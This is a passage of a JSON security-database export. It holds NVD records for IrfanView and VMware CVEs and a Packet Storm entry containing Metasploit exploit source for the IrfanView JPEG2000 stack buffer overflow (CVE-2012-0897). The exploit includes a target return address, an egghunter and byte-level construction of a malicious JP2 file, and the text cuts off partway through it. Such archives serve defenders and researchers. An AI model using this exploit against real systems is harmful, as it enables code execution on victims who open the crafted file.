"AV:A/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:vmware:player:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_client:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:vmware:player:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_view_client:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_client:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_view_client:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:47:17", "description": "Stack-based buffer overflow in the JPEG2000 plugin in IrfanView PlugIns before 4.33 allows remote attackers to execute arbitrary code via a JPEG2000 (JP2) file with a crafted Quantization Default (QCD) marker segment.", "edition": 5, "cvss3": {}, "published": "2012-01-20T17:55:00", "title": "CVE-2012-0897", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0897"], "modified": "2017-08-29T01:31:00", "cpe": ["cpe:/a:irfanview:irfanview:2.50", "cpe:/a:irfanview:irfanview:3.30", "cpe:/a:irfanview:irfanview:3.99", "cpe:/a:irfanview:irfanview:3.15", "cpe:/a:irfanview:irfanview:2.25", "cpe:/a:irfanview:irfanview:3.80", "cpe:/a:irfanview:irfanview:2.97", "cpe:/a:irfanview:irfanview:3.12", "cpe:/a:irfanview:irfanview:2.85", "cpe:/a:irfanview:irfanview:2.62", "cpe:/a:irfanview:irfanview:3.00", "cpe:/a:irfanview:irfanview:2.10", "cpe:/a:irfanview:irfanview:2.32", "cpe:/a:irfanview:irfanview:2.20", "cpe:/a:irfanview:irfanview:2.52", "cpe:/a:irfanview:irfanview:2.40", "cpe:/a:irfanview:irfanview:2.05", "cpe:/a:irfanview:irfanview:3.05", "cpe:/a:irfanview:irfanview:1.99", "cpe:/a:irfanview:irfanview:1.75", "cpe:/a:irfanview:irfanview:3.70", "cpe:/a:irfanview:irfanview:4.27", "cpe:/a:irfanview:irfanview:3.02", "cpe:/a:irfanview:irfanview:2.68", "cpe:/a:irfanview:irfanview:4.10", "cpe:/a:irfanview:irfanview:3.95", "cpe:/a:irfanview:irfanview:2.18", "cpe:/a:irfanview:irfanview:3.98", "cpe:/a:irfanview:irfanview:3.33", "cpe:/a:irfanview:irfanview:3.90", "cpe:/a:irfanview:irfanview:4.28", "cpe:/a:irfanview:irfanview:4.32", "cpe:/a:irfanview:irfanview:3.0.7", "cpe:/a:irfanview:irfanview:3.60", "cpe:/a:irfanview:irfanview:2.65", "cpe:/a:irfanview:irfanview:3.51", "cpe:/a:irfanview:irfanview:1.80", "cpe:/a:irfanview:irfanview:3.21", "cpe:/a:irfanview:irfanview:1.70", "cpe:/a:irfanview:irfanview:2.55", "cpe:/a:irfanview:irfanview:2.95", "cpe:/a:irfanview:irfanview:2.63", "cpe:/a:irfanview:irfanview:2.17", "cpe:/a:irfanview:irfanview:2.92", "cpe:/a:irfanview:irfanview:4.20", "cpe:/a:irfanview:irfanview:3.07", "cpe:/a:irfanview:irfanview:2.90", "cpe:/a:irfanview:irfanview:3.50", "cpe:/a:irfanview:irfanview:1.85", "cpe:/a:irfanview:irfanview:2.35", "cpe:/a:irfanview:irfanview:1.98a", "cpe:/a:irfanview:irfanview:3.75", 
"cpe:/a:irfanview:irfanview:2.07", "cpe:/a:irfanview:irfanview:4.25", "cpe:/a:irfanview:irfanview:3.17", "cpe:/a:irfanview:irfanview:2.30", "cpe:/a:irfanview:irfanview:4.00", "cpe:/a:irfanview:irfanview:3.20", "cpe:/a:irfanview:irfanview:3.97", "cpe:/a:irfanview:irfanview:2.66", "cpe:/a:irfanview:irfanview:2.22", "cpe:/a:irfanview:irfanview:4.22", "cpe:/a:irfanview:irfanview:2.12", "cpe:/a:irfanview:irfanview:3.35", "cpe:/a:irfanview:irfanview:2.82", "cpe:/a:irfanview:irfanview:3.92", "cpe:/a:irfanview:irfanview:3.25", "cpe:/a:irfanview:irfanview:3.85", "cpe:/a:irfanview:irfanview:2.00", "cpe:/a:irfanview:irfanview:4.30", "cpe:/a:irfanview:irfanview:2.83", "cpe:/a:irfanview:irfanview:3.10", "cpe:/a:irfanview:irfanview:1.98", "cpe:/a:irfanview:irfanview:2.27", "cpe:/a:irfanview:irfanview:2.37", "cpe:/a:irfanview:irfanview:2.15", "cpe:/a:irfanview:irfanview:1.90", "cpe:/a:irfanview:irfanview:3.91", "cpe:/a:irfanview:irfanview:1.97", "cpe:/a:irfanview:irfanview:2.98", "cpe:/a:irfanview:irfanview:3.61", "cpe:/a:irfanview:irfanview:4.23", "cpe:/a:irfanview:irfanview:2.80", "cpe:/a:irfanview:irfanview:2.60", "cpe:/a:irfanview:irfanview:1.95", "cpe:/a:irfanview:irfanview:3.36"], "id": "CVE-2012-0897", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0897", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:irfanview:irfanview:3.33:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.15:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.55:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:1.98:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.90:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:1.99:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.35:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:4.25:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.25:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:4.00:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.00:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:4.28:*:*:*:*:*:*:*", 
"cpe:2.3:a:irfanview:irfanview:3.99:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.10:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.98:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.66:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.32:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:1.90:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.22:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:4.10:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:4.23:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.36:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.97:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.50:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.97:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.07:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:1.97:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:4.27:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.90:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:1.70:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.12:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:4.22:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:1.85:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.65:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.68:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.60:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:1.95:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.40:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:1.98a:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.18:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.95:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.61:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.15:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.10:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.91:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.35:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.07:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.30:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.80:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.0.7:*:*:*:*:*:*:*", 
"cpe:2.3:a:irfanview:irfanview:2.37:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.30:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.52:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.83:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.12:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:4.32:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.17:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.70:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.05:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.27:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.98:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.05:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.82:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.50:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.80:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.51:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.02:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.20:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.85:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.63:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.92:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.00:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:4.30:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.21:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.85:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:1.80:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.25:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.92:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.60:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.75:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:1.75:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:4.20:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.62:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.95:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.20:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.17:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:49:49", "description": "TPView.dll in VMware Workstation 10.x before 10.0.6 and 11.x before 
11.1.1, VMware Player 6.x before 6.0.6 and 7.x before 7.1.1, and VMware Horizon Client 3.2.x before 3.2.1, 3.3.x, and 5.x local-mode before 5.4.2 on Windows does not properly allocate memory, which allows guest OS users to execute arbitrary code on the host OS via unspecified vectors, a different vulnerability than CVE-2012-0897.", "edition": 3, "cvss3": {}, "published": "2015-06-13T14:59:00", "title": "CVE-2015-2336", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2336"], "modified": "2016-12-31T02:59:00", "cpe": ["cpe:/a:vmware:player:6.0.4", "cpe:/a:vmware:fusion:6.0.3", "cpe:/a:vmware:player:6.0", "cpe:/a:vmware:player:6.0.5", "cpe:/a:vmware:player:6.0.2", "cpe:/a:vmware:workstation:10.0", "cpe:/a:vmware:workstation:10.0.2", "cpe:/a:vmware:player:7.0", "cpe:/a:vmware:fusion:7.0", "cpe:/a:vmware:fusion:6.0.5", "cpe:/a:vmware:player:7.1", "cpe:/a:vmware:workstation:10.0.1", "cpe:/a:vmware:fusion:6.0.1", "cpe:/a:vmware:horizon_view_client:5.4.1", "cpe:/a:vmware:fusion:6.0", "cpe:/a:vmware:horizon_view_client:5.4", "cpe:/a:vmware:player:6.0.1", "cpe:/a:vmware:player:6.0.3", "cpe:/a:vmware:workstation:10.0.3", "cpe:/a:vmware:workstation:11.1", "cpe:/a:vmware:fusion:7.0.1", "cpe:/a:vmware:fusion:6.0.4", "cpe:/a:vmware:horizon_client:3.2.0", "cpe:/a:vmware:fusion:6.0.2", "cpe:/a:vmware:workstation:10.0.5", "cpe:/a:vmware:workstation:10.0.4", "cpe:/a:vmware:workstation:11.0", "cpe:/a:vmware:horizon_client:3.3"], "id": "CVE-2015-2336", 
"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2336", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:player:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_client:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_view_client:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_client:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_view_client:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:49:49", "description": "TPInt.dll in VMware Workstation 10.x before 10.0.6 and 11.x before 11.1.1, VMware Player 6.x before 6.0.6 and 7.x before 7.1.1, and VMware Horizon Client 3.2.x before 3.2.1, 3.3.x, and 5.x local-mode before 5.4.2 on Windows does not properly allocate memory, which allows guest OS users to execute arbitrary code on the host OS via unspecified vectors.", "edition": 3, "cvss3": {}, "published": 
"2015-06-13T14:59:00", "title": "CVE-2015-2337", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2337"], "modified": "2016-12-31T02:59:00", "cpe": ["cpe:/a:vmware:player:6.0.4", "cpe:/a:vmware:fusion:6.0.3", "cpe:/a:vmware:player:6.0", "cpe:/a:vmware:player:6.0.5", "cpe:/a:vmware:player:6.0.2", "cpe:/a:vmware:workstation:10.0", "cpe:/a:vmware:workstation:10.0.2", "cpe:/a:vmware:player:7.0", "cpe:/a:vmware:fusion:7.0", "cpe:/a:vmware:fusion:6.0.5", "cpe:/a:vmware:player:7.1", "cpe:/a:vmware:workstation:10.0.1", "cpe:/a:vmware:fusion:6.0.1", "cpe:/a:vmware:horizon_view_client:5.4.1", "cpe:/a:vmware:fusion:6.0", "cpe:/a:vmware:horizon_view_client:5.4", "cpe:/a:vmware:player:6.0.1", "cpe:/a:vmware:player:6.0.3", "cpe:/a:vmware:workstation:10.0.3", "cpe:/a:vmware:workstation:11.1", "cpe:/a:vmware:fusion:7.0.1", "cpe:/a:vmware:fusion:6.0.4", "cpe:/a:vmware:horizon_client:3.2.0", "cpe:/a:vmware:fusion:6.0.2", "cpe:/a:vmware:workstation:10.0.5", "cpe:/a:vmware:workstation:10.0.4", "cpe:/a:vmware:workstation:11.0", "cpe:/a:vmware:horizon_client:3.3"], "id": "CVE-2015-2337", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2337", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:player:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_client:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:vmware:fusion:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_view_client:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_client:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_view_client:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.3:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:12:56", "description": "", "published": "2012-07-02T00:00:00", "type": "packetstorm", "title": "Irfanview JPEG2000 4.3.2.0 jp2 Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0897"], "modified": "2012-07-02T00:00:00", "id": "PACKETSTORM:114409", "href": "https://packetstormsecurity.com/files/114409/Irfanview-JPEG2000-4.3.2.0-jp2-Stack-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. 
\n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Remote::Egghunter \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack-based buffer overflow vulnerability in \nversion <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been \ntested on a specific version of irfanview (v4.3.2), although other versions may \nwork also. The vulnerability is triggered via parsing an invalid qcd chunk \nstructure and specifying a malformed qcd size and data. \n \nPayload delivery and vulnerability trigger can be executed in multiple ways. \nThe user can double click the file, use the file dialog, open via the icon \nand drag/drop the file into Irfanview\\'s window. An egg hunter is used for \nstability. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Parvez Anwar <parvez[at]greyhathacker.net>', # vulnerability discovery \n'mr_me <steventhomasseeley[at]gmail.com>', # msf-fu \n'juan vazquez' # more improvements \n], \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2012-0897' ], \n[ 'OSVDB', '78333'], \n[ 'BID', '51426' ], \n[ 'URL', 'http://www.greyhathacker.net/?p=525' ], \n], \n'Platform' => [ 'win' ], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Payload' => \n{ \n'Space' => 4000, \n'DisableNops' => true, \n}, \n'Targets' => \n[ \n# push esp; retn [i_view32.exe] \n# http://www.oldapps.com/irfanview.php?old_irfanview=7097 \n# http://irfanview.tuwien.ac.at/plugins/irfanview_plugins_432_setup.exe \n[ 'Irfanview 4.32 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x004819d8 } ] \n], \n'DisclosureDate' => 'Jan 16 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The output file name.', 
'msf.jp2']), \n], self.class) \nend \n \n# encode our string like unicode except we are not using nulls \ndef encode_bytes(raw_bytes) \nencoded_bytes = \"\" \n0.step(raw_bytes.length-1, 2) { |i| \nencoded_bytes << raw_bytes[i+1] \nencoded_bytes << raw_bytes[i] \n} \nreturn encoded_bytes \nend \n \ndef exploit \njp2 = \"\" \njp2 << \"\\x00\\x00\\x00\\x0c\" # \njp2 << \"\\x6a\\x50\\x20\\x20\" # [jP ] <0x6a502020> magic 0xd0a870a,len 12 \njp2 << \"\\x0d\\x0a\\x87\\x0a\" # \njp2 << \"\\x00\\x00\\x00\\x14\" # \njp2 << \"\\x66\\x74\\x79\\x70\" # \njp2 << \"\\x6a\\x70\\x32\\x20\" # \njp2 << \"\\x00\\x00\\x00\\x00\" # MinorVersion = 0 = [\\0\\0\\0\\0] \njp2 << \"\\x6a\\x70\\x32\\x20\" # Compat = 0x6a703220 = [jp2 ] \njp2 << \"\\x00\\x00\\x00\\x38\" # \njp2 << \"\\x75\\x75\\x69\\x64\" # [uuid] <0x75756964> len 56 data offset 8 \njp2 << \"\\x61\\x70\\x00\\xde\\xec\\x87\" # 56 bytes with start and end tags \njp2 << \"\\xd5\\x11\\xb2\\xed\\x00\\x50\" # \njp2 << \"\\x04\\x71\\xfd\\xdc\\xd2\\x00\" # \njp2 << \"\\x00\\x00\\x40\\x01\\x00\\x00\" # \njp2 << \"\\x00\\x00\\x00\\x00\\x60\\x09\" # \njp2 << \"\\x00\\x00\\x00\\x00\\x00\\x00\" # \njp2 << \"\\x00\\x00\\x00\\x00\\x00\\x00\" # \njp2 << \"\\x00\\x00\\x30\\x00\\x00\\x00\" # \njp2 << \"\\x00\\x00\\x00\\x2d\" # \njp2 << \"\\x6a\\x70\\x32\\x68\" # [jp2h] <0x6a703268> len 45 data offset 8 \njp2 << \"\\x00\\x00\\x00\\x16\" # \njp2 << \"\\x69\\x68\\x64\\x72\" # [ihdr] <0x69686472> len 22 data offset 8 \njp2 << \"\\x00\\x00\\x00\\x0a\" # ImageHeight = 10 \njp2 << \"\\x00\\x00\\x00\\x0a\" # ImageWidth = 10 \njp2 << \"\\x00\\x03\" # NumberOfComponents = 3 \njp2 << \"\\x07\" # BitsPerComponent = 7 \njp2 << \"\\x07\" # Compression = 7 \njp2 << \"\\x01\" # Colorspace = 0x1 = unknown \njp2 << \"\\x00\\x00\\x00\\x00\\x0f\" # \njp2 << \"\\x63\\x6f\\x6c\\x72\" # [colr] <0x636f6c72> len 15 data offset 8 \njp2 << \"\\x01\" # Method = 1 \njp2 << \"\\x00\" # Precedence = 0 \njp2 << \"\\x00\" # ColorSpaceAproximation = 0 \njp2 << 
\"\\x00\\x00\\x00\" # EnumeratedColorSpace = 16 = sRGB \njp2 << \"\\x10\\x00\\x00\\x00\\x00\" # \njp2 << \"\\x6a\\x70\\x32\\x63\" # [jp2c] <0x6a703263> length 0 data offset 8 \njp2 << \"\\xff\\x4f\" # <0xff4f=JP2C_SOC> Start of codestream \njp2 << \"\\xff\\x51\" # <0xff51=JP2C_SIZ> length 47 \njp2 << \"\\x00\\x2f\" # 47 bytes \njp2 << \"\\x00\\x00\" # Capabilities = 0 \njp2 << \"\\x00\\x00\\x00\\x0a\" # GridWidth = 10 \njp2 << \"\\x00\\x00\\x00\\x0a\" # GridHeight = 10 \njp2 << \"\\x00\\x00\\x00\\x00\" # XImageOffset = 0 \njp2 << \"\\x00\\x00\\x00\\x00\" # YImageOffset = 0 \njp2 << \"\\x00\\x00\\x00\\x0a\" # TileWidth = 10 \njp2 << \"\\x00\\x00\\x00\\x0a\" # TileHeight = 10 \njp2 << \"\\x00\\x00\\x00\\x00\" # Xtileoffset = 0 \njp2 << \"\\x00\\x00\\x00\\x00\" # Ytileoffset = 0 \njp2 << \"\\x00\\x03\" # NumberOfComponents = 3 \njp2 << 